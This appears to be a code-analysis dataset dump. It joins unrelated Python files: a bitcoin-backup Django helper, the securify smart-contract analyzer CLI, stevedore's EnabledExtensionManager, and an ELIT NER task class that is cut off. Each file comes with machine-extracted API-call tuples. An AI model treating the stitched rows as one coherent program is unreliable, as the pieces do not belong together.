button_tag = ' <a href="{}" name="{}" id="{}" class="btn btn-secondary" title="{}" role="button"> <strong>{}</strong> </a><br/>'.format(
href, name, id_tag, tooltip, label)
return button_tag
| [
"denova.python.times.seconds_human_readable",
"denova.os.command.run",
"blockchain_backup.bitcoin.state.get_last_access_time",
"denova.os.command.background",
"blockchain_backup.bitcoin.state.set_last_block_updated",
"os.get_exec_path",
"datetime.timedelta",
"denova.os.osid.is_windows",
"os.remove",... | [((761, 770), 'denova.python.log.get_log', 'get_log', ([], {}), '()\n', (768, 770), False, 'from denova.python.log import get_log\n'), ((926, 938), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (936, 938), False, 'from denova.os.osid import is_windows\n'), ((1145, 1157), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (1155, 1157), False, 'from denova.os.osid import is_windows\n'), ((1349, 1361), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (1359, 1361), False, 'from denova.os.osid import is_windows\n'), ((1563, 1575), 'denova.os.osid.is_windows', 'is_windows', ([], {}), '()\n', (1573, 1575), False, 'from denova.os.osid import is_windows\n'), ((2650, 2694), 'denova.os.process.is_program_running', 'is_program_running', (['constants.BACKUP_PROGRAM'], {}), '(constants.BACKUP_PROGRAM)\n', (2668, 2694), False, 'from denova.os.process import get_path, is_program_running\n'), ((2885, 2930), 'denova.os.process.is_program_running', 'is_program_running', (['constants.RESTORE_PROGRAM'], {}), '(constants.RESTORE_PROGRAM)\n', (2903, 2930), False, 'from denova.os.process import get_path, is_program_running\n'), ((7120, 7134), 'blockchain_backup.bitcoin.preferences.get_data_dir', 'get_data_dir', ([], {}), '()\n', (7132, 7134), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((7152, 7168), 'blockchain_backup.bitcoin.preferences.get_backup_dir', 'get_backup_dir', ([], {}), '()\n', (7166, 7168), False, 'from blockchain_backup.bitcoin.preferences import get_backup_dir, get_data_dir\n'), ((8056, 8086), 'os.path.exists', 'os.path.exists', (['debug_log_name'], {}), '(debug_log_name)\n', (8070, 8086), False, 'import os\n'), ((8567, 8610), 'os.path.join', 'os.path.join', (['data_dir', 'constants.DEBUG_LOG'], {}), '(data_dir, constants.DEBUG_LOG)\n', (8579, 8610), False, 'import os\n'), ((14321, 14352), 'blockchain_backup.bitcoin.state.get_last_backed_up_time', 'state.get_last_backed_up_time', ([], {}), '()\n', (14350, 14352), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((14373, 14394), 'blockchain_backup.bitcoin.preferences.get_backup_schedule', 'get_backup_schedule', ([], {}), '()\n', (14392, 14394), False, 'from blockchain_backup.bitcoin.preferences import get_backup_schedule\n'), ((14926, 14957), 'denova.python.times.seconds_human_readable', 'seconds_human_readable', (['seconds'], {}), '(seconds)\n', (14948, 14957), False, 'from denova.python.times import seconds_human_readable\n'), ((18406, 18425), 'os.scandir', 'os.scandir', (['dirname'], {}), '(dirname)\n', (18416, 18425), False, 'import os\n'), ((19034, 19065), 'denova.python.times.seconds_human_readable', 'seconds_human_readable', (['seconds'], {}), '(seconds)\n', (19056, 19065), False, 'from denova.python.times import seconds_human_readable\n'), ((20775, 20793), 'os.get_exec_path', 'os.get_exec_path', ([], {}), '()\n', (20791, 20793), False, 'import os\n'), ((3422, 3443), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (3437, 3443), False, 'import os\n'), ((3948, 3961), 'blockchain_backup.bitcoin.preferences.get_bin_dir', 'get_bin_dir', ([], {}), '()\n', (3959, 3961), False, 'from blockchain_backup.bitcoin.preferences import get_bin_dir\n'), ((4175, 4193), 'denova.os.command.run', 'run', (['*command_args'], {}), '(*command_args)\n', (4178, 4193), False, 'from denova.os.command import background, run\n'), ((6127, 6143), 'blockchain_backup.bitcoin.preferences.get_extra_args', 'get_extra_args', ([], {}), '()\n', 
(6141, 6143), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((8096, 8121), 'os.remove', 'os.remove', (['debug_log_name'], {}), '(debug_log_name)\n', (8105, 8121), False, 'import os\n'), ((9101, 9115), 'blockchain_backup.bitcoin.preferences.get_data_dir', 'get_data_dir', ([], {}), '()\n', (9113, 9115), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((9162, 9178), 'blockchain_backup.bitcoin.preferences.get_extra_args', 'get_extra_args', ([], {}), '()\n', (9176, 9178), False, 'from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args\n'), ((10942, 10973), 'os.path.join', 'os.path.join', (['data_dir', '""".test"""'], {}), "(data_dir, '.test')\n", (10954, 10973), False, 'import os\n'), ((11070, 11089), 'os.remove', 'os.remove', (['filename'], {}), '(filename)\n', (11079, 11089), False, 'import os\n'), ((14440, 14470), 'datetime.timedelta', 'timedelta', ([], {'hours': 'bkup_schedule'}), '(hours=bkup_schedule)\n', (14449, 14470), False, 'from datetime import timedelta\n'), ((16105, 16110), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (16108, 16110), False, 'from django.utils.timezone import now\n'), ((3373, 3390), 'denova.os.process.get_path', 'get_path', (['program'], {}), '(program)\n', (3381, 3390), False, 'from denova.os.process import get_path, is_program_running\n'), ((9652, 9685), 'json.dumps', 'json.dumps', (["{f'{key}_html': html}"], {}), "({f'{key}_html': html})\n", (9662, 9685), False, 'import json\n'), ((16272, 16301), 'blockchain_backup.bitcoin.state.get_start_access_time', 'state.get_start_access_time', ([], {}), '()\n', (16299, 16301), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((16333, 16361), 'blockchain_backup.bitcoin.state.get_last_access_time', 'state.get_last_access_time', ([], {}), '()\n', (16359, 16361), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((16396, 16427), 'blockchain_backup.bitcoin.state.get_last_backed_up_time', 'state.get_last_backed_up_time', ([], {}), '()\n', (16425, 16427), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((18549, 18570), 'os.remove', 'os.remove', (['entry.path'], {}), '(entry.path)\n', (18558, 18570), False, 'import os\n'), ((19572, 19577), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (19575, 19577), False, 'from django.utils.timezone import now\n'), ((19607, 19635), 'blockchain_backup.bitcoin.state.get_last_update_time', 'state.get_last_update_time', ([], {}), '()\n', (19633, 19635), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((19638, 19657), 'datetime.timedelta', 'timedelta', ([], {'hours': '(24)'}), '(hours=24)\n', (19647, 19657), False, 'from datetime import timedelta\n'), ((19864, 19904), 'blockchain_backup.bitcoin.state.set_last_update_time', 'state.set_last_update_time', (['current_time'], {}), '(current_time)\n', (19890, 19904), False, 'from blockchain_backup.bitcoin import constants, state\n'), ((20367, 20392), 'denova.os.command.background', 'background', (['*command_args'], {}), '(*command_args)\n', (20377, 20392), False, 'from denova.os.command import background, run\n'), ((14890, 14895), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (14893, 14895), False, 'from django.utils.timezone import now\n'), ((17186, 17216), 'blockchain_backup.bitcoin.state.get_last_block_updated', 'state.get_last_block_updated', ([], {}), '()\n', (17214, 17216), False, 'from blockchain_backup.bitcoin import constants, state\n'), 
((17996, 18008), 'traceback.format_exc', 'format_exc', ([], {}), '()\n', (18006, 18008), False, 'from traceback import format_exc\n'), ((18975, 18980), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (18978, 18980), False, 'from django.utils.timezone import now\n'), ((20517, 20529), 'traceback.format_exc', 'format_exc', ([], {}), '()\n', (20527, 20529), False, 'from traceback import format_exc\n'), ((11244, 11252), 'denova.os.user.whoami', 'whoami', ([], {}), '()\n', (11250, 11252), False, 'from denova.os.user import whoami\n'), ((17014, 17034), 'os.listdir', 'os.listdir', (['data_dir'], {}), '(data_dir)\n', (17024, 17034), False, 'import os\n'), ((16749, 16754), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (16752, 16754), False, 'from django.utils.timezone import now\n'), ((20152, 20191), 'os.path.dirname', 'os.path.dirname', (['blockchain_backup_file'], {}), '(blockchain_backup_file)\n', (20167, 20191), False, 'import os\n'), ((17526, 17569), 'blockchain_backup.bitcoin.state.set_last_block_updated', 'state.set_last_block_updated', (['current_block'], {}), '(current_block)\n', (17554, 17569), False, 'from blockchain_backup.bitcoin import constants, state\n')] |
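A small usage sketch of the two pure-Python time helpers defined in the row above (not part of the dataset row; it assumes the module and its dependencies import cleanly). The timedelta string is an arbitrary example value.

remaining = format_time('1 day, 2:35:10.123456')   # strips seconds/microseconds -> '1 day, 2:35'
print(wait_period(remaining))                      # -> '>26 hours and 35 minutes'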
import argparse
from pathlib import Path
from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json
from securify.solidity import solidity_ast_compiler, solidity_cfg_compiler
from securify.staticanalysis import static_analysis
from securify.staticanalysis.factencoder import encode
from securify.staticanalysis.visualization import visualize
from securify.utils.ethereum_blockchain import get_contract_from_blockchain
import re
import semantic_version
from securify.solidity.solidity_ast_compiler import compiler_version
import sys
import importlib
def get_list_of_patterns(context=AnalysisContext(), patterns='all', exclude_patterns=[], severity_inc=[], severity_exc=[]):
pattern_classes = discover_patterns()
use_patterns = list(map(lambda p: p(context), pattern_classes))
if patterns != 'all':
# Comply with vulnerability table: add pattern suffix to every pattern name
patterns = list(map(lambda x: x + "Pattern", patterns))
use_patterns = list(filter(lambda p: p.__class__.__name__ in patterns, use_patterns))
extended_exclude_patterns = list(map(lambda x: x + "Pattern", exclude_patterns))
use_patterns = list(filter(lambda p: p.__class__.__name__ not in extended_exclude_patterns, use_patterns))
if severity_inc != []:
use_patterns = list(filter(lambda p: p.severity.name in severity_inc, use_patterns))
if severity_exc != []:
use_patterns = list(filter(lambda p: p.severity.name not in severity_exc, use_patterns))
return use_patterns
class ListPatterns(argparse.Action):
def __call__(self, parser, *args, **kwargs):
patterns = get_list_of_patterns()
for p in patterns:
# Comply with vulnerability table: remove 'Pattern' suffix
print("Name:", p.__class__.__name__.replace('Pattern', ''))
print("Severity:", p.severity.name)
msg = "Description: " + p.description
print(msg)
print(len(msg) * "-")
parser.exit()
def normalize_severity_args(args):
translate = dict(C='CRITICAL', H='HIGH', M='MEDIUM', L='LOW', O='OPTIMIZATION', I='INFO')
if args == 'all':
return translate.values()
if args == 'none':
return []
severities = args.split(',')
severities = [s.strip().upper() for s in severities]
def expand_severity(s):
if len(s) > 1:
return s
else:
return translate[s]
severities = [expand_severity(s) for s in severities]
return severities
def parse_arguments():
parser = argparse.ArgumentParser(
description='securify: A static analyzer for Ethereum contracts.',
usage="securify contract.sol [opts]")
parser.add_argument('contract',
help='A contract to analyze. Can be a file or an address of a contract on blockchain')
parser.add_argument("--ignore-pragma", help="By default securify changes the pragma directives in contracts with pragma \
directives <= 0.5.8. Use this flag to ignore this functionality",
action='store_true')
parser.add_argument("--solidity", help="Define path to solidity binary", default=None)
parser.add_argument("--stack-limit",
help="Set python stack maximum depth. This might be useful since some contracts might exceed this limit.",
type=int,
default=1000)
parser.add_argument("--flatten",
                        help="Create a flattened file based on the imports. The analysis will be done on this new file",
action="store_true")
pattern_group = parser.add_argument_group('Patterns')
pattern_group.add_argument("--list-patterns", "-l", help="List the available patterns to check",
nargs=0,
action=ListPatterns)
pattern_group.add_argument("--use-patterns", "-p",
help="Pattern names separated with spaces to include in the analysis, default='all'",
action="store",
nargs='+',
dest='use_patterns', default='all')
pattern_group.add_argument("--exclude-patterns",
help="Pattern names separated with spaces to exclude from the analysis",
action="store",
nargs='+',
dest='exclude_patterns', default=[])
pattern_group.add_argument("--include-severity", "-i",
help="Severity levels to include: \
CRITICAL, HIGH, MEDIUM, LOW, INFO",
action='store',
nargs='+',
dest='include_severity', default=[])
pattern_group.add_argument("--exclude-severity", "-e",
help="Severity levels to exclude: \
CRITICAL, HIGH, MEDIUM, LOW, INFO",
action='store',
nargs='+',
dest='exclude_severity', default=[])
pattern_group.add_argument("--include-contracts", "-c",
help="Contracts to include in the output",
action='store',
nargs='+',
default='all')
pattern_group.add_argument("--exclude-contracts",
help="Contracts to exclude from the output",
action='store',
nargs='+',
default=[])
pattern_group.add_argument("--show-compliants",
help="Show compliant matches. Useful for debugging.",
action='store_true',
default=False)
parser.add_argument('--visualize', '-v', help='Visualize AST', action='store_true')
parser.add_argument('--output-json', '-j', help='Output in JSON format. \
Notice that the rest of the output will be suppressed.', action='store_true')
etherscan_group = parser.add_argument_group('Etherscan API')
etherscan_group.add_argument('--from-blockchain', '-b',
help="The address of a contract in the Ethereum blockchain.",
action='store_true')
etherscan_group.add_argument('--key', '-k', help="The file where the api-key for etherscan.io is stored.",
default='api_key.txt')
compilation_group = parser.add_argument_group('Compilation of Datalog code')
compilation_group.add_argument('--interpreter',
help="Use the souffle interpreter to run the datalog code.\
Particularly useful when experimenting with new patterns.",
action='store_true')
compilation_group.add_argument('--recompile', help="Force recompilation of the datalog code.",
action='store_true')
base_path = Path(__file__).parent
compilation_group.add_argument('--library-dir', help="Directory of the functors' library.",
default=base_path / 'staticanalysis/libfunctors/')
args = parser.parse_args()
return args
def prepare_env(binary=None):
import os
base_path = Path(__file__).parent / 'staticanalysis/libfunctors/'
def check_for_libfunctors():
libfunctors = base_path / 'libfunctors.so'
compile_script = './compile_functors.sh'
if libfunctors.is_file(): return
print("libfunctors.so not compiled. Compiling it now...")
os.system("cd " + base_path.absolute().as_posix() + " && " + compile_script + "&& cd - > /dev/null")
def check_LD_LIBRARY_PATH():
if 'LD_LIBRARY_PATH' in os.environ: return
print("Environment variable LD_LIBRARY_PATH not set. Setting it up...")
os.environ['LD_LIBRARY_PATH'] = base_path.absolute().as_posix()
def define_SOLC_BINARY(binary=None):
if binary is None: return
print("Setting SOLC_BINARY to {}...".format(binary))
os.environ['SOLC_BINARY'] = binary
check_for_libfunctors()
check_LD_LIBRARY_PATH()
define_SOLC_BINARY(binary)
return
# Reads the current contract and creates a new one with the pragma directive fixed
def fix_pragma(contract):
installed_version = compiler_version()
fixed_pragma_file = "/tmp/fixed_pragma.sol"
rpattern = r"pragma solidity \^?(\d*\.\d*\.\d*);?"
with open(contract) as c:
source = c.read()
pattern = re.compile(rpattern)
    try:
match = pattern.search(source)
solidity_version = match.group(1)
except:
return contract
installed_version = ".".join([str(installed_version.major), str(installed_version.minor), str(installed_version.patch)])
if semantic_version.Version(solidity_version) >= semantic_version.Version(installed_version):
return contract
print("pragma directive defines a prior version to {v}. Changing pragma version to {v}....".format(v=installed_version))
new_source = re.sub(rpattern, r"pragma solidity {};".format(installed_version), source)
with open(fixed_pragma_file, 'w') as f:
f.write(new_source)
return fixed_pragma_file
def main():
save_stdout = sys.stdout
args = parse_arguments()
# suppress the output when outputting json
if args.output_json:
sys.stdout = open('/tmp/securify_suppressed.out', 'w')
prepare_env(binary=args.solidity)
sys.setrecursionlimit(args.stack_limit)
contract = args.contract
if args.flatten:
my_module = importlib.import_module("securify.utils.flattener", package=".")
contract = my_module.flatten(contract)
if args.from_blockchain:
contract = get_contract_from_blockchain(args.contract, args.key)
if not args.ignore_pragma:
contract = fix_pragma(contract)
souffle_config = dict(use_interpreter=args.interpreter, force_recompilation=args.recompile,
library_dir=args.library_dir)
config = AnalysisConfiguration(
# TODO: this returns only the dict ast, but should return the object representation
ast_compiler=lambda t: solidity_ast_compiler.compile_ast(t.source_file),
cfg_compiler=lambda t: solidity_cfg_compiler.compile_cfg(t.ast).cfg,
static_analysis=lambda t: static_analysis.analyze_cfg(t.cfg, **souffle_config),
)
context = AnalysisContext(
config=config,
source_file=contract
)
if args.visualize:
cfg = context.cfg
facts, _ = encode(cfg)
visualize(facts).render("out/dl", format="svg", cleanup=True)
patterns = get_list_of_patterns(context=context,
patterns=args.use_patterns,
exclude_patterns=args.exclude_patterns,
severity_inc=args.include_severity,
severity_exc=args.exclude_severity)
matches = []
for pattern in patterns:
matches.extend(pattern.find_matches())
skip_compliant = not args.show_compliants
sys.stdout = save_stdout
if args.output_json:
print_pattern_matches_json(context, matches, skip_compliant=skip_compliant,
include_contracts=args.include_contracts,
exclude_contracts=args.exclude_contracts)
else:
print_pattern_matches(context, matches, skip_compliant=skip_compliant,
include_contracts=args.include_contracts,
exclude_contracts=args.exclude_contracts)
if __name__ == '__main__':
main()
| [
"sys.setrecursionlimit",
"securify.analyses.analysis.AnalysisContext",
"securify.solidity.solidity_cfg_compiler.compile_cfg",
"importlib.import_module",
"argparse.ArgumentParser",
"re.compile",
"pathlib.Path",
"securify.solidity.solidity_ast_compiler.compile_ast",
"securify.staticanalysis.visualizat... | [((673, 690), 'securify.analyses.analysis.AnalysisContext', 'AnalysisContext', ([], {}), '()\n', (688, 690), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((786, 805), 'securify.analyses.analysis.discover_patterns', 'discover_patterns', ([], {}), '()\n', (803, 805), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((2650, 2788), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""securify: A static analyzer for Ethereum contracts."""', 'usage': '"""securify contract.sol [opts]"""'}), "(description=\n 'securify: A static analyzer for Ethereum contracts.', usage=\n 'securify contract.sol [opts]')\n", (2673, 2788), False, 'import argparse\n'), ((8858, 8876), 'securify.solidity.solidity_ast_compiler.compiler_version', 'compiler_version', ([], {}), '()\n', (8874, 8876), False, 'from securify.solidity.solidity_ast_compiler import compiler_version\n'), ((9054, 9074), 're.compile', 're.compile', (['rpattern'], {}), '(rpattern)\n', (9064, 9074), False, 'import re\n'), ((10028, 10067), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['args.stack_limit'], {}), '(args.stack_limit)\n', (10049, 10067), False, 'import sys\n'), ((10980, 11032), 'securify.analyses.analysis.AnalysisContext', 'AnalysisContext', ([], {'config': 'config', 'source_file': 'contract'}), '(config=config, source_file=contract)\n', (10995, 11032), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((7489, 7503), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (7493, 7503), False, 'from pathlib import Path\n'), ((9337, 9379), 'semantic_version.Version', 'semantic_version.Version', (['solidity_version'], {}), '(solidity_version)\n', (9361, 9379), False, 'import semantic_version\n'), ((9383, 9426), 'semantic_version.Version', 'semantic_version.Version', (['installed_version'], {}), '(installed_version)\n', (9407, 9426), False, 'import semantic_version\n'), ((10144, 10208), 'importlib.import_module', 'importlib.import_module', (['"""securify.utils.flattener"""'], {'package': '"""."""'}), "('securify.utils.flattener', package='.')\n", (10167, 10208), False, 'import importlib\n'), ((10305, 10358), 'securify.utils.ethereum_blockchain.get_contract_from_blockchain', 'get_contract_from_blockchain', (['args.contract', 'args.key'], {}), '(args.contract, args.key)\n', (10333, 10358), False, 'from securify.utils.ethereum_blockchain import get_contract_from_blockchain\n'), ((11124, 11135), 'securify.staticanalysis.factencoder.encode', 'encode', (['cfg'], {}), '(cfg)\n', (11130, 11135), False, 'from securify.staticanalysis.factencoder import encode\n'), ((11749, 11917), 'securify.analyses.analysis.print_pattern_matches_json', 'print_pattern_matches_json', (['context', 'matches'], {'skip_compliant': 'skip_compliant', 'include_contracts': 'args.include_contracts', 'exclude_contracts': 'args.exclude_contracts'}), '(context, matches, skip_compliant=skip_compliant,\n include_contracts=args.include_contracts, exclude_contracts=args.\n exclude_contracts)\n', (11775, 11917), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((11997, 
12160), 'securify.analyses.analysis.print_pattern_matches', 'print_pattern_matches', (['context', 'matches'], {'skip_compliant': 'skip_compliant', 'include_contracts': 'args.include_contracts', 'exclude_contracts': 'args.exclude_contracts'}), '(context, matches, skip_compliant=skip_compliant,\n include_contracts=args.include_contracts, exclude_contracts=args.\n exclude_contracts)\n', (12018, 12160), False, 'from securify.analyses.analysis import discover_patterns, AnalysisContext, AnalysisConfiguration, print_pattern_matches, print_pattern_matches_json\n'), ((7803, 7817), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (7807, 7817), False, 'from pathlib import Path\n'), ((10744, 10792), 'securify.solidity.solidity_ast_compiler.compile_ast', 'solidity_ast_compiler.compile_ast', (['t.source_file'], {}), '(t.source_file)\n', (10777, 10792), False, 'from securify.solidity import solidity_ast_compiler, solidity_cfg_compiler\n'), ((10905, 10957), 'securify.staticanalysis.static_analysis.analyze_cfg', 'static_analysis.analyze_cfg', (['t.cfg'], {}), '(t.cfg, **souffle_config)\n', (10932, 10957), False, 'from securify.staticanalysis import static_analysis\n'), ((11144, 11160), 'securify.staticanalysis.visualization.visualize', 'visualize', (['facts'], {}), '(facts)\n', (11153, 11160), False, 'from securify.staticanalysis.visualization import visualize\n'), ((10825, 10865), 'securify.solidity.solidity_cfg_compiler.compile_cfg', 'solidity_cfg_compiler.compile_cfg', (['t.ast'], {}), '(t.ast)\n', (10858, 10865), False, 'from securify.solidity import solidity_ast_compiler, solidity_cfg_compiler\n')] |
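A quick illustration of the severity normalization helper defined in the row above (not part of the dataset row); the input strings are arbitrary examples.

print(normalize_severity_args('c, high, M'))   # -> ['CRITICAL', 'HIGH', 'MEDIUM']
print(normalize_severity_args('none'))         # -> []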
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from .extension import ExtensionManager
LOG = logging.getLogger(__name__)
class EnabledExtensionManager(ExtensionManager):
"""Loads only plugins that pass a check function.
The check_func argument should return a boolean, with ``True``
indicating that the extension should be loaded and made available
and ``False`` indicating that the extension should be ignored.
:param namespace: The namespace for the entry points.
:type namespace: str
:param check_func: Function to determine which extensions to load.
:type check_func: callable, taking an :class:`Extension`
instance as argument
:param invoke_on_load: Boolean controlling whether to invoke the
object returned by the entry point after the driver is loaded.
:type invoke_on_load: bool
:param invoke_args: Positional arguments to pass when invoking
the object returned by the entry point. Only used if invoke_on_load
is True.
:type invoke_args: tuple
:param invoke_kwds: Named arguments to pass when invoking
the object returned by the entry point. Only used if invoke_on_load
is True.
:type invoke_kwds: dict
:param propagate_map_exceptions: Boolean controlling whether exceptions
are propagated up through the map call or whether they are logged and
then ignored
:type propagate_map_exceptions: bool
:param on_load_failure_callback: Callback function that will be called when
an entrypoint can not be loaded. The arguments that will be provided
when this is called (when an entrypoint fails to load) are
(manager, entrypoint, exception)
:type on_load_failure_callback: function
:param verify_requirements: Use setuptools to enforce the
dependencies of the plugin(s) being loaded. Defaults to False.
:type verify_requirements: bool
"""
def __init__(self, namespace, check_func, invoke_on_load=False,
invoke_args=(), invoke_kwds={},
propagate_map_exceptions=False,
on_load_failure_callback=None,
verify_requirements=False,):
self.check_func = check_func
super(EnabledExtensionManager, self).__init__(
namespace,
invoke_on_load=invoke_on_load,
invoke_args=invoke_args,
invoke_kwds=invoke_kwds,
propagate_map_exceptions=propagate_map_exceptions,
on_load_failure_callback=on_load_failure_callback,
verify_requirements=verify_requirements,
)
def _load_one_plugin(self, ep, invoke_on_load, invoke_args, invoke_kwds,
verify_requirements):
ext = super(EnabledExtensionManager, self)._load_one_plugin(
ep, invoke_on_load, invoke_args, invoke_kwds,
verify_requirements,
)
if ext and not self.check_func(ext):
LOG.debug('ignoring extension %r', ep.name)
return None
return ext
| [
"logging.getLogger"
] | [((619, 646), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (636, 646), False, 'import logging\n')] |
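An illustrative sketch of how ``EnabledExtensionManager`` is typically used (not part of the row above). The entry-point namespace and the ``enabled`` attribute consulted by the check function are assumptions for illustration.

from stevedore.enabled import EnabledExtensionManager

def only_enabled(ext):
    # Keep extensions whose plugin class sets ``enabled = True``.
    return getattr(ext.plugin, 'enabled', False)

mgr = EnabledExtensionManager(
    namespace='myapp.drivers',   # hypothetical entry-point namespace
    check_func=only_enabled,
    invoke_on_load=True,
)
names = mgr.map(lambda ext: ext.name)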
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2020-12-03 14:35
import logging
from typing import Union, List, Dict, Any, Iterable, Callable, Set
import torch
from hanlp_trie import DictInterface
from torch.utils.data import DataLoader
from elit.common.dataset import SamplerBuilder, PadSequenceDataLoader
from elit.common.transform import VocabDict
from elit.components.mtl.tasks import Task
from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer
from elit.layers.crf.crf import CRF
from elit.layers.scalar_mix import ScalarMixWithDropoutBuilder
from elit.metrics.metric import Metric
from elit.metrics.mtl import MetricDict
from hanlp_common.util import merge_locals_kwargs
class LinearCRFDecoder(torch.nn.Module):
def __init__(self,
hidden_size,
num_labels,
secondary_encoder=None,
crf=False) -> None:
super().__init__()
self.secondary_encoder = secondary_encoder
self.classifier = torch.nn.Linear(hidden_size, num_labels)
self.crf = CRF(num_labels) if crf else None
def forward(self, contextualized_embeddings: torch.FloatTensor, batch: Dict[str, torch.Tensor], mask=None):
if self.secondary_encoder:
contextualized_embeddings = self.secondary_encoder(contextualized_embeddings, mask=mask)
return self.classifier(contextualized_embeddings)
class TaggingNamedEntityRecognition(Task, TransformerNamedEntityRecognizer):
def __init__(self,
trn: str = None,
dev: str = None,
tst: str = None,
sampler_builder: SamplerBuilder = None,
dependencies: str = None,
scalar_mix: ScalarMixWithDropoutBuilder = None,
use_raw_hidden_states=False,
lr=1e-3,
separate_optimizer=False,
max_seq_len=None,
sent_delimiter=None,
char_level=False,
hard_constraint=False,
tagging_scheme=None,
crf=False,
delimiter_in_entity=None,
merge_types: List[str] = None,
secondary_encoder=None,
token_key='token',
dict_whitelist: Union[DictInterface, Union[Dict[str, Any], Set[str]]] = None,
dict_blacklist: Union[DictInterface, Union[Dict[str, Any], Set[str]]] = None,
**kwargs) -> None:
r"""A simple tagger using a linear layer with an optional CRF (:cite:`lafferty2001conditional`) layer for
NER task. It can utilize whitelist gazetteers which is dict mapping from entity name to entity type.
During decoding, it performs longest-prefix-matching of these words to override the prediction from
underlining statistical model. It also uses a blacklist to mask out mis-predicted entities.
.. Note:: For algorithm beginners, longest-prefix-matching is the prerequisite to understand what dictionary can
do and what it can't do. The tutorial in `this book <http://nlp.hankcs.com/book.php>`_ can be very helpful.
Args:
trn: Path to training set.
dev: Path to dev set.
tst: Path to test set.
sampler_builder: A builder which builds a sampler.
dependencies: Its dependencies on other tasks.
scalar_mix: A builder which builds a `ScalarMixWithDropout` object.
use_raw_hidden_states: Whether to use raw hidden states from transformer without any pooling.
lr: Learning rate for this task.
separate_optimizer: Use customized separate optimizer for this task.
max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible.
sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can
be split here.
char_level: Whether the sequence length is measured at char level, which is never the case for
lemmatization.
hard_constraint: Whether to enforce hard length constraint on sentences. If there is no ``sent_delimiter``
in a sentence, it will be split at a token anyway.
crf: ``True`` to enable CRF (:cite:`lafferty2001conditional`).
delimiter_in_entity: The delimiter between tokens in entity, which is used to rebuild entity by joining
tokens during decoding.
merge_types: The types of consecutive entities to be merged.
secondary_encoder: An optional secondary encoder to provide enhanced representation by taking the hidden
states from the main encoder as input.
token_key: The key to tokens in dataset. This should always be set to ``token`` in MTL.
dict_whitelist: A :class:`dict` or a :class:`~hanlp_trie.dictionary.DictInterface` of gazetteers to be
included into the final results.
dict_blacklist: A :class:`set` or a :class:`~hanlp_trie.dictionary.DictInterface` of badcases to be
excluded from the final results.
**kwargs:
"""
super().__init__(**merge_locals_kwargs(locals(), kwargs))
self.vocabs = VocabDict()
self.secondary_encoder = secondary_encoder
self.dict_whitelist = dict_whitelist
self.dict_blacklist = dict_blacklist
def build_dataloader(self,
data,
transform: Callable = None,
training=False,
device=None,
logger: logging.Logger = None,
cache=False,
gradient_accumulation=1,
**kwargs) -> DataLoader:
args = dict((k, self.config[k]) for k in
['delimiter', 'max_seq_len', 'sent_delimiter', 'char_level', 'hard_constraint'] if k in self.config)
dataset = self.build_dataset(data, cache=cache, transform=transform, **args)
dataset.append_transform(self.vocabs)
if self.vocabs.mutable:
self.build_vocabs(dataset, logger)
return PadSequenceDataLoader(
batch_sampler=self.sampler_builder.build(
self.compute_lens(data, dataset, 'token_input_ids', 'token'),
shuffle=training, gradient_accumulation=gradient_accumulation),
device=device,
dataset=dataset)
def compute_loss(self,
batch: Dict[str, Any],
output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any],
criterion) -> Union[torch.FloatTensor, Dict[str, torch.FloatTensor]]:
return TransformerNamedEntityRecognizer.compute_loss(self, criterion, output, batch['tag_id'], batch['mask'])
def decode_output(self,
output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any],
mask: torch.BoolTensor,
batch: Dict[str, Any],
decoder,
**kwargs) -> Union[Dict[str, Any], Any]:
return TransformerNamedEntityRecognizer.decode_output(self, output, batch['mask'], batch, decoder)
def update_metrics(self,
batch: Dict[str, Any],
output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any],
prediction: Dict[str, Any],
metric: Union[MetricDict, Metric]):
return TransformerNamedEntityRecognizer.update_metrics(self, metric, output, batch['tag_id'], batch['mask'],
batch, prediction)
def build_model(self, encoder_size, training=True, **kwargs) -> torch.nn.Module:
